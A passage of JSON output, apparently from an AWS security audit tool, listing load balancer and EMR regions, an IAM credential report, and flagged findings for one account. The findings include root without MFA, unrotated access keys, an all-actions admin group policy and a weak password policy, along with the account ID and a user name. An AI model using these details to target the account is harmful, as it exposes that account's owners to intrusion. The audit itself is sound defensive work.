0,"vpc_resource_types": ["lbs"],"vpcs": {}},"us-east-2": {"lbs_count": 0,"region": "us-east-2","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"us-west-1": {"lbs_count": 0,"region": "us-west-1","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}},"us-west-2": {"lbs_count": 0,"region": "us-west-2","ssl_policies": {},"ssl_policies_count": 0,"vpc_resource_types": ["lbs"],"vpcs": {}}},"regions_count": 21,"resource_types": {"global": ["ssl_policies"],"region": [],"vpc": ["lbs"]},"service": "elbv2","ssl_policies_count": 0,"targets": {"first_region": [["lbs","LoadBalancers","describe_load_balancers",{},false],["ssl_policies","SslPolicies","describe_ssl_policies",{},false]],"other_regions": [["lbs","LoadBalancers","describe_load_balancers",{},false]]},"thread_config": {"list": 10,"parse": 20}},"emr": {"clusters_count": 0,"filters": {},"findings": {},"regions": {"af-south-1": {"clusters_count": 0,"region": "af-south-1","vpc_resource_types": ["clusters"],"vpcs": {}},"ap-east-1": {"clusters_count": 0,"region": "ap-east-1","vpc_resource_types": ["clusters"],"vpcs": {}},"ap-northeast-1": {"clusters_count": 0,"region": "ap-northeast-1","vpc_resource_types": ["clusters"],"vpcs": {}},"ap-northeast-2": {"clusters_count": 0,"region": "ap-northeast-2","vpc_resource_types": ["clusters"],"vpcs": {}},"ap-northeast-3": {"clusters_count": 0,"region": "ap-northeast-3","vpc_resource_types": ["clusters"],"vpcs": {}},"ap-south-1": {"clusters_count": 0,"region": "ap-south-1","vpc_resource_types": ["clusters"],"vpcs": {}},"ap-southeast-1": {"clusters_count": 0,"region": "ap-southeast-1","vpc_resource_types": ["clusters"],"vpcs": {}},"ap-southeast-2": {"clusters_count": 0,"region": "ap-southeast-2","vpc_resource_types": ["clusters"],"vpcs": {}},"ca-central-1": {"clusters_count": 0,"region": "ca-central-1","vpc_resource_types": ["clusters"],"vpcs": {}},"eu-central-1": {"clusters_count": 0,"region": "eu-central-1","vpc_resource_types": ["clusters"],"vpcs": {}},"eu-north-1": {"clusters_count": 0,"region": "eu-north-1","vpc_resource_types": ["clusters"],"vpcs": {}},"eu-south-1": {"clusters_count": 0,"region": "eu-south-1","vpc_resource_types": ["clusters"],"vpcs": {}},"eu-west-1": {"clusters_count": 0,"region": "eu-west-1","vpc_resource_types": ["clusters"],"vpcs": {}},"eu-west-2": {"clusters_count": 0,"region": "eu-west-2","vpc_resource_types": ["clusters"],"vpcs": {}},"eu-west-3": {"clusters_count": 0,"region": "eu-west-3","vpc_resource_types": ["clusters"],"vpcs": {}},"me-south-1": {"clusters_count": 0,"region": "me-south-1","vpc_resource_types": ["clusters"],"vpcs": {}},"sa-east-1": {"clusters_count": 0,"region": "sa-east-1","vpc_resource_types": ["clusters"],"vpcs": {}},"us-east-1": {"clusters_count": 0,"region": "us-east-1","vpc_resource_types": ["clusters"],"vpcs": {}},"us-east-2": {"clusters_count": 0,"region": "us-east-2","vpc_resource_types": ["clusters"],"vpcs": {}},"us-west-1": {"clusters_count": 0,"region": "us-west-1","vpc_resource_types": ["clusters"],"vpcs": {}},"us-west-2": {"clusters_count": 0,"region": "us-west-2","vpc_resource_types": ["clusters"],"vpcs": {}}},"regions_count": 21,"resource_types": {"global": [],"region": [],"vpc": ["clusters"]},"service": "emr","targets": {"first_region": [["clusters","Clusters","list_clusters",{},false]],"other_regions": [["clusters","Clusters","list_clusters",{},false]]},"thread_config": {"list": 10,"parse": 20}},"iam": {"credential_report": {"": {"access_key_1_active": "false","access_key_1_last_rotated": "N/A","access_key_1_last_used_date": "N/A","access_key_1_last_used_region": "N/A","access_key_1_last_used_service": "N/A","access_key_2_active": "false","access_key_2_last_rotated": "N/A","access_key_2_last_used_date": "N/A","access_key_2_last_used_region": "N/A","access_key_2_last_used_service": "N/A","arn": "arn:aws:iam::430150006394:root","cert_1_active": "false","cert_1_last_rotated": "N/A","cert_2_active": "false","cert_2_last_rotated": "N/A","mfa_active": "false","password_enabled": "not_supported","password_last_changed": "not_supported","password_last_used": "2021-01-31T18:29:28+00:00","password_next_rotation": "not_supported","user": "","user_creation_time": "2013-12-19T08:57:25+00:00"},"dams": {"access_key_1_active": "true","access_key_1_last_rotated": "2013-12-19T09:13:40+00:00","access_key_1_last_used_date": "N/A","access_key_1_last_used_region": "N/A","access_key_1_last_used_service": "N/A","access_key_2_active": "true","access_key_2_last_rotated": "2019-01-25T17:58:41+00:00","access_key_2_last_used_date": "2021-01-31T19:12:00+00:00","access_key_2_last_used_region": "ap-northeast-1","access_key_2_last_used_service": "rds","arn": "arn:aws:iam::430150006394:user/dams","cert_1_active": "false","cert_1_last_rotated": "N/A","cert_2_active": "false","cert_2_last_rotated": "N/A","mfa_active": "false","password_enabled": "false","password_last_changed": "N/A","password_last_used": "N/A","password_next_rotation": "N/A","user": "dams","user_creation_time": "2013-12-19T09:13:40+00:00"}},"credential_report_count": 1,"filters": {"iam-role-for-EC2": {"checked_items": 7,"dashboard_name": "Roles","description": "Role for EC2","display_path": "iam.roles.id","flagged_items": 1,"items": ["iam.roles.AROAI265GPNVMDZAKJPPA.assume_role_policy.PolicyDocument.Statement.0"],"level": "","path": "iam.roles.id.assume_role_policy.PolicyDocument.Statement.id","rationale": "N/A","service": "IAM"},"iam-role-for-Lambda": {"checked_items": 7,"dashboard_name": "Roles","description": "Role for Lambda","display_path": "iam.roles.id","flagged_items": 1,"items": ["iam.roles.AROAJY5MNJYDKGD2UIATQ.assume_role_policy.PolicyDocument.Statement.0"],"level": "","path": "iam.roles.id.assume_role_policy.PolicyDocument.Statement.id","rationale": "N/A","service": "IAM"},"iam-role-for-cross-account": {"checked_items": 7,"dashboard_name": "Roles","description": "Role for cross account","display_path": "iam.roles.id","flagged_items": 0,"items": [],"level": "","path": "iam.roles.id.assume_role_policy.PolicyDocument.Statement.id","rationale": "N/A","service": "IAM"},"iam-role-for-same-account": {"checked_items": 7,"dashboard_name": "Roles","description": "Role for same account","display_path": "iam.roles.id","flagged_items": 0,"items": [],"level": "","path": "iam.roles.id.assume_role_policy.PolicyDocument.Statement.id","rationale": "N/A","service": "IAM"}},"findings": {"iam-assume-role-lacks-external-id-and-mfa": {"checked_items": 7,"dashboard_name": "Roles","description": "Cross-account AssumeRole policy lacks external ID and MFA","display_path": "iam.roles.id","flagged_items": 0,"items": [],"level": "danger","path": "iam.roles.id.assume_role_policy.PolicyDocument.Statement.id","rationale": "When authorizing cross-account role assumption, an external ID or MFA should be required.","service": "IAM"},"iam-assume-role-policy-allows-all": {"checked_items": 7,"dashboard_name": "Roles","description": "AssumeRole policy allows all principals","display_path": "iam.roles.id","flagged_items": 0,"items": [],"level": "danger","path": "iam.roles.id.assume_role_policy.PolicyDocument.Statement.id","rationale": "Setting the AssumeRole policy's principal attribute to AWS:* means that anyone is authorized to assume the role and access the AWS account.","service": "IAM"},"iam-ec2-role-without-instances": {"checked_items": 0,"dashboard_name": "Roles","description": "Unused role for EC2","display_path": "iam.roles.id","flagged_items": 0,"id_suffix": "instances","items": [],"level": "warning","path": "iam.roles.id.assume_role_policy.Statement.id.Principal","rationale": "N/A","service": "IAM"},"iam-group-with-inline-policies": {"checked_items": 1,"dashboard_name": "groups","description": "Group with inline policies","flagged_items": 1,"id_suffix": "inline_policies","items": ["iam.groups.AGPAIW3P3726RZDVZBZL2.inline_policies"],"level": "warning","path": "iam.groups.id","rationale": "N/A","service": "IAM"},"iam-group-with-no-users": {"checked_items": 1,"dashboard_name": "groups","description": "Group with no users","flagged_items": 0,"items": [],"level": "warning","path": "iam.groups.id","rationale": "Groups with no users should be reviewed and deleted if not necessary.","service": "IAM"},"iam-inline-group-policy-allows-NotActions": {"checked_items": 1,"dashboard_name": "Policies","description": "Inline group policy allows NotActions","display_path": "iam.groups.id","flagged_items": 0,"items": [],"level": "danger","path": "iam.groups.id.inline_policies.id.PolicyDocument.Statement.id","rationale": "The combination of \"effect = allow\" and \"NotAction\" results in the policy allowing every action except those listed in the statement. The target policy does not follow the principle of least privilege because thousands of actions exist in AWS and because this policy automatically authorizes users to perform new actions created, regardless of their nature.","service": "IAM"},"iam-inline-group-policy-allows-iam-PassRole": {"checked_items": 1,"dashboard_name": "Policies","description": "Inline group policy allows iam:PassRole *","display_path": "iam.groups.id","flagged_items": 0,"items": [],"level": "danger","path": "iam.groups.id.inline_policies.id.PolicyDocument.Statement.id","rationale": "N/A","service": "IAM"},"iam-inline-group-policy-allows-sts-AssumeRole": {"checked_items": 1,"dashboard_name": "Policies","description": "Inline group policy allows sts:AssumeRole *","display_path": "iam.groups.id","flagged_items": 0,"items": [],"level": "danger","path": "iam.groups.id.inline_policies.id.PolicyDocument.Statement.id","rationale": "N/A","service": "IAM"},"iam-inline-role-policy-allows-NotActions": {"checked_items": 0,"dashboard_name": "Policies","description": "Inline role policy allows NotActions","display_path": "iam.roles.id","flagged_items": 0,"items": [],"level": "danger","path": "iam.roles.id.inline_policies.id.PolicyDocument.Statement.id","rationale": "The combination of \"effect = allow\" and \"NotAction\" results in the policy allowing every action except those listed in the statement. The target policy does not follow the principle of least privilege because thousands of actions exist in AWS and because this policy automatically authorizes users to perform new actions created, regardless of their nature.","service": "IAM"},"iam-inline-role-policy-allows-iam-PassRole": {"checked_items": 0,"dashboard_name": "Policies","description": "Inline role policy allows iam:PassRole *","display_path": "iam.roles.id","flagged_items": 0,"items": [],"level": "danger","path": "iam.roles.id.inline_policies.id.PolicyDocument.Statement.id","rationale": "N/A","service": "IAM"},"iam-inline-role-policy-allows-sts-AssumeRole": {"checked_items": 0,"dashboard_name": "Policies","description": "Inline role policy allows sts:AssumeRole *","display_path": "iam.roles.id","flagged_items": 0,"items": [],"level": "danger","path": "iam.roles.id.inline_policies.id.PolicyDocument.Statement.id","rationale": "N/A","service": "IAM"},"iam-inline-user-policy-allows-NotActions": {"checked_items": 0,"dashboard_name": "Policies","description": "Inline user policy allows NotActions","display_path": "iam.users.id","flagged_items": 0,"items": [],"level": "danger","path": "iam.users.id.inline_policies.id.PolicyDocument.Statement.id","rationale": "The combination of \"effect = allow\" and \"NotAction\" results in the policy allowing every action except those listed in the statement. The target policy does not follow the principle of least privilege because thousands of actions exist in AWS and because this policy automatically authorizes users to perform new actions created, regardless of their nature.","service": "IAM"},"iam-inline-user-policy-allows-iam-PassRole": {"checked_items": 0,"dashboard_name": "Policies","description": "Inline user policy allows iam:PassRole *","display_path": "iam.users.id","flagged_items": 0,"items": [],"level": "danger","path": "iam.users.id.inline_policies.id.PolicyDocument.Statement.id","rationale": "N/A","service": "IAM"},"iam-inline-user-policy-allows-sts-AssumeRole": {"checked_items": 0,"dashboard_name": "Policies","description": "Inline user policy allows sts:AssumeRole *","display_path": "iam.users.id","flagged_items": 0,"items": [],"level": "danger","path": "iam.users.id.inline_policies.id.PolicyDocument.Statement.id","rationale": "N/A","service": "IAM"},"iam-managed-policy-allows-NotActions": {"checked_items": 11,"dashboard_name": "Policies","description": "Managed policy allows NotActions","display_path": "iam.policies.id","flagged_items": 0,"items": [],"level": "danger","path": "iam.policies.id.PolicyDocument.Statement.id","rationale": "The combination of \"effect = allow\" and \"NotAction\" results in the policy allowing every action except those listed in the statement. The target policy does not follow the principle of least privilege because thousands of actions exist in AWS and because this policy automatically authorizes users to perform new actions created, regardless of their nature.","service": "IAM"},"iam-managed-policy-allows-iam-PassRole": {"checked_items": 11,"dashboard_name": "Policies","description": "Managed policy allows iam:PassRole *","display_path": "iam.policies.id","flagged_items": 1,"items": ["iam.policies.ANPAIDI2BQT2LKXZG36TW.PolicyDocument.Statement.0"],"level": "danger","path": "iam.policies.id.PolicyDocument.Statement.id","rationale": "N/A","service": "IAM"},"iam-managed-policy-allows-sts-AssumeRole": {"checked_items": 11,"dashboard_name": "Policies","description": "Managed policy allows sts:AssumeRole *","display_path": "iam.policies.id","flagged_items": 0,"items": [],"level": "danger","path": "iam.policies.id.PolicyDocument.Statement.id","rationale": "N/A","service": "IAM"},"iam-managed-policy-no-attachments": {"checked_items": 7,"dashboard_name": "Policies","description": "Managed policy not attached to any entity","display_path": "iam.policies.id","flagged_items": 0,"items": [],"level": "warning","path": "iam.policies.id","rationale": "Customer Managed policies should be reviewed and deleted if not necessary.","service": "IAM"},"iam-password-policy-minimum-length": {"checked_items": 1,"dashboard_name": "Password policy","description": "Minimum password length too short","flagged_items": 1,"items": ["iam.password_policy.MinimumPasswordLength"],"level": "danger","path": "iam.password_policy.MinimumPasswordLength","rationale": "N/A","service": "IAM"},"iam-password-policy-no-expiration": {"checked_items": 1,"dashboard_name": "Password policy","description": "Password expiration disabled","flagged_items": 1,"items": ["iam.password_policy.ExpirePasswords"],"level": "danger","path": "iam.password_policy.ExpirePasswords","rationale": "N/A","service": "IAM"},"iam-password-policy-reuse-enabled": {"checked_items": 1,"dashboard_name": "Password policy","description": "Password reuse enabled","flagged_items": 1,"items": ["iam.password_policy.PasswordReusePrevention"],"level": "danger","path": "iam.password_policy.PasswordReusePrevention","rationale": "N/A","service": "IAM"},"iam-role-with-inline-policies": {"checked_items": 7,"dashboard_name": "Roles","description": "Role with inline policies","flagged_items": 0,"id_suffix": "inline_policies","items": [],"level": "warning","path": "iam.roles.id","rationale": "N/A","service": "IAM"},"iam-root-account-no-mfa": {"checked_items": 1,"dashboard_name": "Root account","description": "Lack of MFA (root account)","flagged_items": 1,"id_suffix": "mfa_active","items": ["iam.credential_report..mfa_active"],"level": "danger","path": "iam.credential_report.","rationale": "N/A","service": "IAM"},"iam-root-account-used-recently": {"checked_items": 1,"dashboard_name": "Root account","description": "Root account used recently","flagged_items": 1,"id_suffix": "password_last_used","items": ["iam.credential_report..password_last_used"],"level": "danger","path": "iam.credential_report.","rationale": "N/A","service": "IAM"},"iam-root-account-with-active-certs": {"checked_items": 1,"dashboard_name": "Root account","description": "Root account has active X.509 certs","flagged_items": 0,"items": [],"level": "danger","path": "iam.credential_report.","rationale": "Root account X.509 certificates should be deleted as they may be used to make SOAP-protocol requests in the context of the root account.","service": "IAM"},"iam-root-account-with-active-keys": {"checked_items": 1,"dashboard_name": "Root account","description": "Root account has active keys","flagged_items": 0,"items": [],"level": "danger","path": "iam.credential_report.","rationale": "AWS root account access keys should be deleted as they provide unrestricted access to the AWS Account.","service": "IAM"},"iam-user-no-Active-key-rotation": {"checked_items": 2,"dashboard_name": "Access keys","description": "Lack of key rotation (Active)","display_path": "iam.users.id","flagged_items": 2,"items": ["iam.users.AIDAJUK77MEJCW5J3DWZU.AccessKeys.0","iam.users.AIDAJUK77MEJCW5J3DWZU.AccessKeys.1"],"level": "danger","path": "iam.users.id.AccessKeys.id","rationale": "In case of access key compromise, the lack of credential rotation increases the period during which an attacker has access to the AWS account","service": "IAM"},"iam-user-no-Inactive-key-rotation": {"checked_items": 2,"dashboard_name": "Access keys","description": "Lack of key rotation (Inactive)","display_path": "iam.users.id","flagged_items": 0,"items": [],"level": "warning","path": "iam.users.id.AccessKeys.id","rationale": "In case of access key compromise, the lack of credential rotation increases the period during which an attacker has access to the AWS account","service": "IAM"},"iam-user-with-inline-policies": {"checked_items": 1,"dashboard_name": "Users","description": "User with inline policies","flagged_items": 0,"id_suffix": "inline_policies","items": [],"level": "warning","path": "iam.users.id","rationale": "N/A","service": "IAM"},"iam-user-with-multiple-access-keys": {"checked_items": 1,"dashboard_name": "Users","description": "User with multiple API keys","flagged_items": 1,"id_suffix": "multiple_api_keys","items": ["iam.users.AIDAJUK77MEJCW5J3DWZU.multiple_api_keys"],"level": "warning","path": "iam.users.id","rationale": "N/A","service": "IAM"},"iam-user-without-mfa": {"checked_items": 1,"dashboard_name": "Users","description": "User without MFA","flagged_items": 0,"id_suffix": "mfa_enabled","items": [],"level": "danger","path": "iam.users.id","rationale": "N/A","service": "IAM"}},"groups": {"AGPAIW3P3726RZDVZBZL2": {"CreateDate": "2013-12-19 09:13:40+00:00","Path": "/","arn": "arn:aws:iam::430150006394:group/devs","id": "AGPAIW3P3726RZDVZBZL2","inline_policies": {"58cd3df92811df89e93933e00cd5a76813cf6258": {"PolicyDocument": {"Statement": [{"Action": ["*"],"Effect": "Allow","Resource": ["*"]}],"Version": "2012-10-17"},"name": "AdministratorAccess-201312191013"}},"inline_policies_count": 1,"name": "devs","users": ["AIDAJUK77MEJCW5J3DWZU"]}},"groups_count": 1,"password_policy": {"AllowUsersToChangePassword": true,"ExpirePasswords": false,"MinimumPasswordLength": 6,"PasswordReusePrevention": false,"RequireLowercaseCharacters": false,"RequireNumbers": false,"RequireSymbols": false,"RequireUppercaseCharacters": false},"password_policy_count": 1,"permissions": {"Action": {"*": {"groups": {"Allow": {"AGPAIW3P3726RZDVZBZL2": {"Resource": {"*": {"inline_policies": {"58cd3df92811df89e93933e00cd5a76813cf6258": {"condition": null}}}}}}}},"a4b:getDevice": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"a4b:getProfile": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"a4b:getRoom": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"a4b:getRoomSkillParameter": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"a4b:getSkillGroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"a4b:searchDevices": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"a4b:searchProfiles": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"a4b:searchRooms": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"a4b:searchSkillGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"access-analyzer:getFinding": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"access-analyzer:listAnalyzers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"access-analyzer:listArchiveRules": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"access-analyzer:listFindings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"acm-pca:describeCertificateAuthority": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"acm-pca:describeCertificateAuthorityAuditReport": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"acm-pca:getCertificate": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"acm-pca:getCertificateAuthorityCertificate": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"acm-pca:getCertificateAuthorityCsr": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"acm-pca:listCertificateAuthorities": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"acm-pca:listTags": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"acm:describeCertificate": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"acm:getCertificate": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"acm:listCertificates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"acm:listTagsForCertificate": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"amplify:getApp": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"amplify:getBranch": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"amplify:getDomainAssociation": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"amplify:getJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"amplify:getWebhook": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"amplify:listApps": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"amplify:listWebhooks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"apigateway:GET": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"arn:aws:apigateway:*::/account": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/apis": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/apis/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/apis/*/authorizers": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/apis/*/authorizers/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/apis/*/deployments": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/apis/*/deployments/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/apis/*/integrations": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/apis/*/integrations/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/apis/*/integrations/*/integrationresponses": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/apis/*/integrations/*/integrationresponses/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/apis/*/models": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/apis/*/models/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/apis/*/routes": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/apis/*/routes/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/apis/*/routes/*/routeresponses": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/apis/*/routes/*/routeresponses/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/apis/*/stages": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/apis/*/stages/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/clientcertificates": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/clientcertificates/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/domainnames": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/domainnames/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/domainnames/*/apimappings": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/domainnames/*/apimappings/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/domainnames/*/basepathmappings": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/domainnames/*/basepathmappings/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/restapis": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/restapis/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/restapis/*/authorizers": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/restapis/*/authorizers/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/restapis/*/deployments": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/restapis/*/deployments/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/restapis/*/models": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/restapis/*/models/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/restapis/*/models/*/default_template": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/restapis/*/resources": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/restapis/*/resources/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/restapis/*/resources/*/methods/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/restapis/*/resources/*/methods/*/integration": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/restapis/*/resources/*/methods/*/integration/responses/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/restapis/*/resources/*/methods/*/responses/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/restapis/*/stages": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/restapis/*/stages/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}},"arn:aws:apigateway:*::/restapis/*/stages/*/sdks/*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"application-autoscaling:DeleteScalingPolicy": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"application-autoscaling:DeregisterScalableTarget": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"application-autoscaling:Describe*": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"application-autoscaling:PutScalingPolicy": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"application-autoscaling:RegisterScalableTarget": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"application-autoscaling:describeScalableTargets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"application-autoscaling:describeScalingActivities": {"roles": {"Allow": 